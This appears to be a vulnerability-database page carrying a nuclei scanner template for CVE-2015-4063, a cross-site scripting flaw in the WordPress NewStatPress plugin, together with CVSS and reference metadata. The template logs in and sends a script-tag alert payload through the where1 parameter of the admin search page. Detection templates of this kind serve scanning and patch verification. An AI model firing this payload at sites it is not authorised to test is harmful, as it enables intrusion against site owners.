Lucene search
+L

NewStatPress <0.9.9 - Cross-Site Scripting

🗓️ 16 Aug 2026 02:26:45Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 48 Views

WordPress NewStatPress plugin <0.9.9 XS

Related
Refs
Code
ReporterTitlePublishedViews
Family
zdt
zdt
WordPress NewStatPress 0.9.8 Cross Site Scripting / SQL Injection Vulnerabilities
26 May 201500:00
zdt
circl
Circl
CVE-2015-4063
26 May 201500:00
circl
cnvd
CNVD
WordPress NewStatPress plugin cross-site scripting vulnerability
26 May 201500:00
cnvd
cve
CVE
CVE-2015-4063
27 May 201518:00
cve
cvelist
Cvelist
CVE-2015-4063
27 May 201518:00
cvelist
exploitdb
Exploit DB
WordPress Plugin NewStatPress 0.9.8 - Multiple Vulnerabilities
26 May 201500:00
exploitdb
euvd
EUVD
EUVD-2015-4089
7 Oct 202500:30
euvd
exploitpack
exploitpack
WordPress Plugin NewStatPress 0.9.8 - Multiple Vulnerabilities
26 May 201500:00
exploitpack
nvd
NVD
CVE-2015-4063
27 May 201518:59
nvd
packetstorm
Packet Storm
WordPress NewStatPress 0.9.8 Cross Site Scripting / SQL Injection
25 May 201500:00
packetstorm
Rows per page
id: CVE-2015-4063

info:
  name: NewStatPress <0.9.9 - Cross-Site Scripting
  author: r3Y3r53
  severity: low
  description: |
    WordPress NewStatPress plugin before 0.9.9 contains a cross-site scripting vulnerability in includes/nsp_search.php. The plugin allows remote authenticated users to inject arbitrary web script or HTML via the where1 parameter in the nsp_search page to wp-admin/admin.php.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
  remediation: Update to plugin version 0.9.9 or latest.
  reference:
    - https://packetstormsecurity.com/files/132038/
    - https://wordpress.org/plugins/newstatpress/
    - http://packetstormsecurity.com/files/132038/WordPress-NewStatPress-0.9.8-Cross-Site-Scripting-SQL-Injection.html
    - https://nvd.nist.gov/vuln/detail/CVE-2015-4063
    - https://wordpress.org/plugins/newstatpress/changelog/
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:S/C:N/I:P/A:N
    cvss-score: 3.5
    cve-id: CVE-2015-4063
    cwe-id: CWE-79
    epss-score: 0.06188
    epss-percentile: 0.92876
    cpe: cpe:2.3:a:newstatpress_project:newstatpress:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: newstatpress_project
    product: newstatpress
    framework: wordpress
  tags: cve2015,cve,xss,wordpress,wp-plugin,wp,newstatpress,packetstorm,newstatpress_project,vuln,authenticated

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

      - |
        GET /wp-admin/admin.php?where1=<script>alert(document.domain)</script>&searchsubmit=Buscar&page=nsp_search HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - "contains(body_2, '<script>alert(document.domain)</script>') && contains(body_2, 'newstatpress')"
        condition: and
# digest: 4a0a004730450220706a0a787bf391c2cbc743253ff52cc146886abf0b5f4e48553996229ebc75a2022100941ffb463072ed5d9a96381c12e5e0c9cce6de7c0143e1fd15abaf1f51a3340e:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 23.5
EPSS0.06188
48